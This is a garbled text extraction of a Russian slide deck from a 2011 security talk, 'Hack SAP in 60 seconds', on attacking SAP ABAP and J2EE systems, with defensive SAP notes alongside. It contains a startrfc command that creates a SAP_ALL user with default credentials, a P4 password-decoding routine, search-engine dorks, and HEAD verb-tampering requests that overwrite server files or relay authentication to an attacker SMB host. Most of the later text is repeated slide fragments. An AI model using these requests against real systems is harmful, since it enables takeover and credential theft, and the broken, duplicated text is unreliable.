sap risspa

Invest in securityto secure investments

Взломать SAP за 60 cекунд

Александр ПоляковТехнический Директор Digital Security

at RiSSPA

я

erpscancom 2ERPScan mdash invest in security to secure investments

Доклады о безопасности SAP

bull Всего более 40


Количество SAP notes за год

bull Всего более 1500 на сентябрь 2011г


Публичная информация об уязвимостях



SAP не дремлет

Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасе


Поговорим о безопасности

bull Что мы знаем о SAPbull Проблемы ответственности и контроляbull Примеры обхода SODbull Уязвимости ABAP движка из интернетbull Уязвимости J2EE движка из интернетbull Взломать SAP за 60 секунд демо


Что мы знаем о SAP

Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)


Shut up

And

Pay

SAP Who cares


Постоянные новые угрозы

bull Тема атак на SAP стала ldquoмоднойrdquo в security community

bull Публикуется множество уязвимостей

bull Ежегодно появляются угрозы

erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций

Что делать

bull Администраторы не достаточно осведомлены

bull Понимание безопасности только на уровне матрицы SOD

bull Системы усложняются

Как атакуют

2007 ndash Архитектурные уязвимости RFC

2008 ndash Атаки на рабочие станции SAP

2009 ndash Бэкдоры для SAP атаки на SAPRouter

2010 ndash Атаки на WEB-приложения SAP

2010 ndash Stuxnet под SAP

2011 ndash Архитектурные и программные уязвимости в ERP


Что дальше

Последний год

2011 ndash Атаки на JAVA движок SAP

2011 ndash SQL инъекции в ABAP

2011 ndash Переполнение буффера в ABAP

2011 ndash Атаки Session Fixation в SAP

2011 ndash Атаки на SAPGUI

2011 ndash Спуфинг и перехват DIAG протокола


Что дальше

Угрозы для бизнеса

Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов

Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)

Мошенничествоbull Подмена данных о платежахbull Ложные транзакции


Как защищаемся

erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities

Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий

Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий

Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий

Что происходит сейчас

Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000

А как обстоят дела с настройками безопасности платформы


Как проконтролировать безопасность столь сложной системы


1001 Способ обойти SOD

bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости


Не диалоговые пользователи

Есть множество RFC функций для создания пользователя

Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL

Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций

Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации

Атаки на Gateway и Message Server

bull Атаки описаны в руководстве по безопасности SAP

bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений

ndash вызвать зарегистрированный RFC сервис типа SAPXPG

ndash зарегистрировать свой RFC сервис

bull Есть настройки позволяющие

элементарно закрыть уязвимости


Если это так просто и очевидно почему в 90 аудитов настроено не безопасно

Хитрые настройки

Администратор выставил следующие настройки

loginmin_password_uppercase = 2

loginmin_password_lng = 8

loginmin_password_specials = 2

loginpassword_compliance_to_current_policy = 0

loginpassword_max_idle_productive =90

loginpassword_max_idle_initial = 90

В чём проблема


Прямой доступ к таблицам

bull Чтение таблиц

ndash через транзакции SE16 SM31 SM30 SA38 SE38

ndash через RFC вызовы RFC_READ_TABLE

bull Критичные таблицы

USR02 mdash хеши паролей

SSF_PSE_D mdash ключи для SSO доступа

RFCDES ndash пароли в открытом и зашифрованном виде

ICFSERVLOC - пароли для ICF сервисов в открытом виде

и ещё немного пока под секретом


Доступ из интернет + уязвимости


Атаки на ICM (ABAP)

Более 1500 сервисов с критичным функционалом

1) По умолчанию разрешён доступ любым пользователем

2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC

3) Используя пароли по умолчанию типа TMSADMPASSWORD


Как итог - полный контроль системы злоумышленником

Прочие небезопасные сервисы

bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных

инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB


Нами изучено более 50 небезопасных сервисов

Атаки на J2EE Engine

NetWeaver J2EE = интеграция управление взаимодействие

bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager


J2EE Platform Architecture


Удалённый доступ


Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900

HTTP over SSL 5NN01 50001 50001-59901

IIOP 5NN07 50007 50007-59907

IIOP Initial Context 5NN02 50002 50002-59902

IIOP over SSL 5NN03 50003 50003-59903

P4 5NN04 50004 50004-59904

P4 over HTTP 5NN05 50005 50005-59905

P4 over SSL 5NN06 50006 50006-59906

Telnet 5NN08 50008 50008-59908

LogViewer control 5NN09 50009 50009-59909

JMS 5NN10 50010 50010-59910

По умолчанию шифрование на всех портах отключено

Уязвимый алгоритм шифрования паролей в P4


bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован

Как он закодирован





Удиви меня



87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result

Защита


bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm

Взлом из интернет


SAP системы доступны только из внутренней сети о да в самом деле

inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs

Из чего состоит J2EE Engine


SAP NetWeaver 64

300 web ndashприложений



SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72

1200 web ndashприложений и это только в TRIAL

Раскрытие информации


bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208

bull Логи и трейсыDSECRG-00191DSECRG-00232

bull Имена пользователейDSECRG-11-034

bull Сканирование внутренней сети через внешний уязвимый сервер

DSECRG-11-032 DSECRG-00175

New

New

Раскрытие информации DSECRG-11-023






Host is not alive

Port closed

HTTP port

SAP port

Раскрытие информации DSECRG-00231


Защита


bull SAP notes154854815458831503856948851 1545883

bull Удаление ненужных и не поддерживаемых приложений

Межсайтовый скриптинг


15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability

19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS

19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS

20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS

14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS

И это только те что закрыты

SMBRelay


httpserverportmmrMMRfilename=smbsnifferanyfile

CSRF + SmbRelay = CSSR



Заставь нажать на эту ссылку того у кого есть к ней доступ

Защита от CSRF


Встроенное API для защиты от CSRF

bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)

bull Custom CSRF Protection Обработка CSRF токенов на разработчике

Есть множество мест где эта защита не реализована

SPML


Аутентификация


Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic

Programmatic Используя UME

Declarative Используя WEBXML

Декларативная аутентификация


ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt

Обход аутентификации Invoker Servlet


bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction

bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)

Защита


bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually

Массовый взлом

bull


I have a dream helliphellip

Уязвимость Verb Tampering


А что если попробовать HEAD вместо GET

ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt

Отказ в обслуживании

Приложение Integration Directory

HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10


Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети

интернет

Получение доступа к ОС


HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10


Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под

управлением Windows

Полный контроль

bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера

bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет


Взломать SAP за 60 секунд

ДЕМООООООООООООО


Победа


Защита


bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов

Итоги

Проблема ответственности и контроля


Будущая работа

Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)

Новостиbull dsecrgru bull erpscanru

Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел

Кузьмин Антон Спирин bull Организаторам Risspa

Опросbull Тренинг по безопасности SAP


ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ

Взломать SAP за 60 cекунд Александр Поляков Технический Дирек

я







SAP Who cares







Slide 16













Уязвимый алгоритм шифрования паролей в P4 (2)



Защита



Из чего состоит J2EE Engine (2)








Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63

я




















Shut up

And

Pay

SAP Who cares







Что делать












Что дальше









Что дальше














































































HTTP over SSL 5NN01 50001 50001-59901

IIOP 5NN07 50007 50007-59907


IIOP over SSL 5NN03 50003 50003-59903

P4 5NN04 50004 50004-59904

P4 over HTTP 5NN05 50005 50005-59905

P4 over SSL 5NN06 50006 50006-59906

Telnet 5NN08 50008 50008-59908


JMS 5NN10 50010 50010-59910










Удиви меня




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63



















Shut up

And

Pay

SAP Who cares







Что делать












Что дальше









Что дальше














































































HTTP over SSL 5NN01 50001 50001-59901

IIOP 5NN07 50007 50007-59907


IIOP over SSL 5NN03 50003 50003-59903

P4 5NN04 50004 50004-59904

P4 over HTTP 5NN05 50005 50005-59905

P4 over SSL 5NN06 50006 50006-59906

Telnet 5NN08 50008 50008-59908


JMS 5NN10 50010 50010-59910










Удиви меня




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63

SAP Who cares







Что делать












Что дальше









Что дальше














































































HTTP over SSL 5NN01 50001 50001-59901

IIOP 5NN07 50007 50007-59907


IIOP over SSL 5NN03 50003 50003-59903

P4 5NN04 50004 50004-59904

P4 over HTTP 5NN05 50005 50005-59905

P4 over SSL 5NN06 50006 50006-59906

Telnet 5NN08 50008 50008-59908


JMS 5NN10 50010 50010-59910










Удиви меня




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63






Что делать












Что дальше









Что дальше














































































HTTP over SSL 5NN01 50001 50001-59901

IIOP 5NN07 50007 50007-59907


IIOP over SSL 5NN03 50003 50003-59903

P4 5NN04 50004 50004-59904

P4 over HTTP 5NN05 50005 50005-59905

P4 over SSL 5NN06 50006 50006-59906

Telnet 5NN08 50008 50008-59908


JMS 5NN10 50010 50010-59910










Удиви меня




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63









Что дальше









Что дальше














































































HTTP over SSL 5NN01 50001 50001-59901

IIOP 5NN07 50007 50007-59907


IIOP over SSL 5NN03 50003 50003-59903

P4 5NN04 50004 50004-59904

P4 over HTTP 5NN05 50005 50005-59905

P4 over SSL 5NN06 50006 50006-59906

Telnet 5NN08 50008 50008-59908


JMS 5NN10 50010 50010-59910










Удиви меня




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63









Что дальше














































































HTTP over SSL 5NN01 50001 50001-59901

IIOP 5NN07 50007 50007-59907


IIOP over SSL 5NN03 50003 50003-59903

P4 5NN04 50004 50004-59904

P4 over HTTP 5NN05 50005 50005-59905

P4 over SSL 5NN06 50006 50006-59906

Telnet 5NN08 50008 50008-59908


JMS 5NN10 50010 50010-59910










Удиви меня




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63














































































HTTP over SSL 5NN01 50001 50001-59901

IIOP 5NN07 50007 50007-59907


IIOP over SSL 5NN03 50003 50003-59903

P4 5NN04 50004 50004-59904

P4 over HTTP 5NN05 50005 50005-59905

P4 over SSL 5NN06 50006 50006-59906

Telnet 5NN08 50008 50008-59908


JMS 5NN10 50010 50010-59910










Удиви меня




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63









Удиви меня




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63




Защита









SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63







SAP NetWeaver 64




SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63



SAP NetWeaver 70




SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63



SAP NetWeaver 71




SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63



SAP NetWeaver 72









New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63








New

New







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63







Host is not alive

Port closed

HTTP port

SAP port



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63



Защита


bull SAP notes154854815458831503856948851 1545883










SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63









SMBRelay













SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63











SPML














Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63













Защита




bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63


bull












интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63










интернет














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63














Победа


Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63

Защита



Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63

Итоги












я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63










я







SAP Who cares







Slide 16
















Защита











Защита (2)


SMBRelay



SPML




Защита (3)







Победа

Защита (4)

Итоги


Slide 63

sap risspa

Documents